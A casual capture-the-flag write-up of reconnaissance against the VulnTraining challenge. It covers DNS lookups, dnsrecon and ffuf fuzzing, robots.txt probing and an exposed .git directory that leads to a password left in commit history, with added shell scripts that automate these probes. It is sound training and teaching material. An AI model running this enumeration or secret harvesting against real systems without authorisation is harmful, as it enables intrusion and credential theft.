Attacking VulnTraining Part 1

This weekend I decided to take a look at another CTF Challenge between chores. However, the next challenge I have access to in the free tier of CTF Challenge, called VulnTraining, has 11 flags, so I guess I am not getting this one done in a day.

I start with the basics. I tweaked my .zshrc config to put my CTF Challenge cookie header into a variable and decided to test it by running curl -H "$CTF_CHALLENGE_COOKIE" http://vulntraining.co.uk (the quotes matter, otherwise the shell splits the header on the space after "Cookie:"), and in the HTML I see there is a flag. I enter it into the submission field and boom, I have got flag 5, which is awesome but also annoying, because I kind of prefer to get flags in sequential order.

After a quick bit of cleaning up, I come back to see what else I can find quickly. I perform a lookup using nslookup -type=any vulntraining.co.uk 8.8.8.8 and see something a little out of place: the email address looks like a subdomain and does not have an @ symbol (the RNAME field of an SOA record writes the mailbox with the @ replaced by a dot, which is why it reads like a hostname). I decide to curl the weird-looking mail address, but an error comes back saying it could not resolve the host. In any case I have an email address to remember for later.

I then run dnsrecon using dnsrecon -d vulntraining.co.uk -D ~/ctfs/ctfchallenge/wordlists/subdomains.txt -t brt and, as it brute-forces subdomains, I go and do some more cleaning.

I get the dnsrecon results back and it returns two new subdomains. I decide that I am going to use a tool called XMind, recommended by Jason Haddix, to help map out the structure of the domain.

I head to the shops to grab some food to cook for lunch, do some more chores and come back again. I put the domain into crt.sh and get another subdomain to add to my mind map. To be honest I have to quash the desire to start putting IP addresses into Nmap and scanning for vulnerabilities; that is not the point of CTF Challenge's CTFs, maybe next time I should try a Hack The Box exercise.

I decide to focus on one subdomain or the root domain at a time, looking at the root domain first. I start up ffuf, first of all scanning for more subdomains using ffuf -t 2 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/subdomains.txt -u http://FUZZ.vulntraining.co.uk -H "$CTF_CHALLENGE_COOKIE" -mc all -fc 404, then fuzzing for directories using ffuf -t 2 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/content.txt -u http://vulntraining.co.uk/FUZZ -H "$CTF_CHALLENGE_COOKIE" -mc all -fc 404.

I start to see some interesting results from the directory scan, but I decide to take my sister's dog (I am dog-sitting) for a walk to help get my blood sugar back down.

Coming back I see that there is a Git repo, a robots.txt file and some other interesting goodies, so I decide to work out which results are directories worth fuzzing further. One result called server redirects me to a login page at /server/login, and I make a note. /framework gives me a permission denied response, and I note that /.git gives me a 403 but /.git/HEAD does not, so I make a note of that too.

Looking at /robots.txt I see they have a Disallow entry. That only tells well-behaved crawlers like Google not to fetch that path; it is not an access control, so it is the first thing worth requesting directly. I try it and find flag 2: a win for the find, a loss for the sequential-order OCD.
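The robots.txt step above, as an added POSIX sh example that is not part of the original write-up: it pulls every Disallow path out of a robots.txt and, for a live target, requests each one with the challenge cookie so 200s stand out from 403s and redirects. The sample robots.txt is constructed, and the $CTF_CHALLENGE_COOKIE variable is assumed to hold a full "Cookie: name=value" header.

```shell
#!/bin/sh
# Added example, not from the original write-up: extract Disallow paths from
# robots.txt and probe them directly. The sample robots.txt below is
# constructed and $CTF_CHALLENGE_COOKIE (a full "Cookie: ..." header) is assumed.

# Prints each unique Disallow path from the robots.txt text in $1. Skips
# comments, blank lines, empty Disallow entries (which allow everything) and
# trailing comments; tolerates CRLF line endings and mixed-case directives.
# Entries may contain wildcards (* and $), which you would expand by hand.
robots_disallowed() {
    printf '%s\n' "$1" | tr -d '\r' | awk -F: '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        tolower($1) ~ /^[[:space:]]*disallow[[:space:]]*$/ {
            path = $0
            sub(/^[^:]*:[[:space:]]*/, "", path)
            sub(/[[:space:]]+#.*$/, "", path)
            sub(/[[:space:]]+$/, "", path)
            if (path != "" && !seen[path]++) print path
        }'
}

# Live helper: fetch robots.txt from a base URL and print "status path" for
# each disallowed entry. Not run by the offline demo below.
probe_disallowed() {
    _base="${1%/}"
    _robots=$(curl -fsS -H "$CTF_CHALLENGE_COOKIE" "$_base/robots.txt") || return 1
    robots_disallowed "$_robots" | while IFS= read -r _path; do
        _code=$(curl -s -o /dev/null -w '%{http_code}' -H "$CTF_CHALLENGE_COOKIE" "$_base$_path")
        printf '%s %s\n' "$_code" "$_path"
    done
}

# Constructed sample, standing in for a downloaded robots.txt.
SAMPLE_ROBOTS='User-agent: *
# keep crawlers away from the admin area
Disallow: /admin/
disallow: /hidden-notes/   # trailing comment
Disallow:
Disallow: /admin/
Allow: /public/'

# Offline demo; run probe_disallowed "http://target" for a live check.
robots_disallowed "$SAMPLE_ROBOTS"
```

The parser deliberately ignores User-agent grouping: when you are the attacker, every Disallow line is a hint regardless of which crawler it was aimed at.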

I decide to look into the Git repo next and request /.git/HEAD, /.git/index and /.git/config. That downloads three files, and through the remote URL in the config I find the publicly accessible GitHub repo.
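The same .git check, as an added POSIX sh example that is not from the original write-up. It verifies that /.git/HEAD really is a git HEAD (many servers answer with a 200 HTML error page rather than a 404), then pulls the remote URL out of the downloaded config. The target URL, the $CTF_CHALLENGE_COOKIE variable and the sample config are assumptions.

```shell
#!/bin/sh
# Added example, not from the original write-up: detect an exposed .git
# directory and recover the remote repository URL from .git/config. The
# target host, $CTF_CHALLENGE_COOKIE (assumed to hold a full "Cookie: ..."
# header) and the sample config below are assumptions.

# Returns 0 if the text looks like a real git HEAD file: a symbolic ref or a
# bare 40-hex commit id. A 200 status on /.git/HEAD alone proves nothing.
looks_like_git_head() {
    printf '%s\n' "$1" | grep -Eq '^(ref: refs/[A-Za-z0-9_./-]+|[0-9a-f]{40})$'
}

# Prints the url of the named remote (default "origin") from the git config
# text in $1. Tolerates CRLF and either tab or space indentation.
extract_remote_url() {
    _remote="${2:-origin}"
    printf '%s\n' "$1" | tr -d '\r' | awk -v want="[remote \"$_remote\"]" '
        /^[[:space:]]*\[/ { in_section = (index($0, want) > 0); next }
        in_section && /^[[:space:]]*url[[:space:]]*=/ {
            sub(/^[[:space:]]*url[[:space:]]*=[[:space:]]*/, ""); print; exit
        }'
}

# Live check: fetch HEAD, sanity-check it, then fetch config and print the
# origin URL. curl -f turns a 403/404 into a failure instead of HTML noise.
probe_exposed_git() {
    _base="${1%/}"
    _head=$(curl -fsS -H "$CTF_CHALLENGE_COOKIE" "$_base/.git/HEAD") || return 1
    looks_like_git_head "$_head" || { echo "HEAD does not look like git: $_head" >&2; return 1; }
    _cfg=$(curl -fsS -H "$CTF_CHALLENGE_COOKIE" "$_base/.git/config") || return 1
    extract_remote_url "$_cfg"
}

# Constructed sample, standing in for a downloaded /.git/config.
SAMPLE_GIT_CONFIG='[core]
    repositoryformatversion = 0
    bare = false
[remote "origin"]
    url = https://github.com/example-org/vulntraining-example.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
    remote = origin
    merge = refs/heads/master'

# Offline demo; run probe_exposed_git "http://target" for a live check.
extract_remote_url "$SAMPLE_GIT_CONFIG"
```

If config has no remote (a repo that was only ever deployed by copying), the next step is dumping the objects directly, which is a different exercise; a remote URL, as in this challenge, is the shortcut.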

I open the GitHub repo and browse the commit history. Thankfully it is only 3 commits, and the latest one talks about removing a password. Pro-tip: if a secret is committed to history, removing it in a later commit is not enough, because the earlier commit (and every clone or fork of it) still contains the secret; you need to rotate the secret. I note down where to find the DB password and have a quick look at some functions, but decide not to try and find any vulnerabilities in the code and its logic just yet.
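To show concretely why the pro-tip holds, here is an added POSIX sh example that is not part of the original write-up. It builds a throwaway repository with a constructed password, "removes" it in a second commit exactly as the challenge's repo did, and then recovers the secret from history with plain git commands. It needs git on PATH; nothing else about the challenge is assumed.

```shell
#!/bin/sh
# Added example, not from the original write-up: removing a secret in a later
# commit leaves it in history. Uses a constructed secret in a temporary repo;
# requires git on PATH.

git_commit() {
    # Identity and signing are set inline so the demo ignores ~/.gitconfig.
    git -c user.name=demo -c user.email=demo@example.invalid -c commit.gpgsign=false \
        commit -q -m "$1"
}

# Prints "working=<matches in checkout> history=<commits touching secret> recovered=<old line>".
secret_in_history_demo() {
    _secret="$1"
    _dir=$(mktemp -d) || return 1
    (
        cd "$_dir" || exit 1
        git init -q . 2>/dev/null
        printf 'DB_PASSWORD=%s\n' "$_secret" > config.php   # constructed secret
        git add config.php
        git_commit 'initial commit'
        printf 'DB_PASSWORD=\n' > config.php                 # the "fix"
        git add config.php
        git_commit 'remove password from config'

        # The checked-out tree is clean (grep -c prints 0 and exits 1 on no match)...
        _working=$(grep -c -- "$_secret" config.php || true)
        # ...but the pickaxe finds every commit that added or removed the string,
        _history=$(git log --all --oneline -S"$_secret" | wc -l | tr -d ' ')
        # and the previous version of the file is one command away.
        _recovered=$(git show HEAD~1:config.php)
        printf 'working=%s history=%s recovered=%s\n' "$_working" "$_history" "$_recovered"
    )
    _rc=$?
    rm -rf "$_dir"
    return $_rc
}

secret_in_history_demo 'Sup3rSecret'
```

The pickaxe (-S) is the fast way to audit a whole repo for a known string; for an unknown one, git log -p --all piped through grep, or git rev-list --all piped into git grep, covers every version of every file, which is exactly what an attacker reading the public repo will do.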

I do notice that it looks like /framework will have some sub-directories, so I decide to fuzz it with ffuf -t 2 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/content.txt -u http://vulntraining.co.uk/framework/FUZZ -H "$CTF_CHALLENGE_COOKIE" -mc all -fc 404.

While waiting for that I take a look at the site hosted on the root domain: nothing really special apart from the original flag I found, a single page, which is PHP (yuck). I then change my mind and decide to look through the code on GitHub, noticing that there should be at least four sub-directories, which ffuf finds, and nothing else.

I then run another ffuf scan on /.git to see if I find anything interesting, but to be honest I am not holding my breath. After taking a look at the source code on GitHub I realise I am too tired to process it, so I decide to leave that for another day. The fuzz of /.git provides nothing useful, so I decide to fuzz /server to see what else I get.

[Image: "Fuzz all the things" meme]

Again the extra fuzzing does not find anything new; the only two directories left are css and js, which I decide to leave for later. I quickly curl the server's login page to see if there is a flag in there somewhere but find nothing. I debate what to do next: I could try to brute-force the login form or switch to a subdomain. I decide to see how hard it would be to get a working login and find that the error message for a bad login is generic and does not specify whether the username or the password is incorrect, it only returns "Your username or password is incorrect". I decide I cannot be bothered right now.

I decide to quickly check out the extra subdomain I found via crt.sh and see flag 1 just sitting there, which gives me a bit more motivation to push on for a little bit longer. I then switch to admin.vulntraining.co.uk and have a quick fuzz, first for subdomains of admin and then for directories. I find the directories /admin and /invoices and add them to the mind map, but I do not find any further subdomains.

I quickly try fuzzing the billing subdomain and get no new subdomains, but I do start getting 429 (Too Many Requests) responses. I am not sure why, so I adjust my rate limiting and try to get more sub-directories. I get it all sorted and start getting some 302 responses for numerical sub-directories, and then the usual logout and login sub-directories.

I try curling the root of the admin subdomain and the two directories and get unauthorised responses, at which point I decide to call it a day; I am tired and really want a nap. I am still happy with the progress I made, considering this was a CTF that I was chipping away at while I did chores, and I really look forward to picking it up again soon.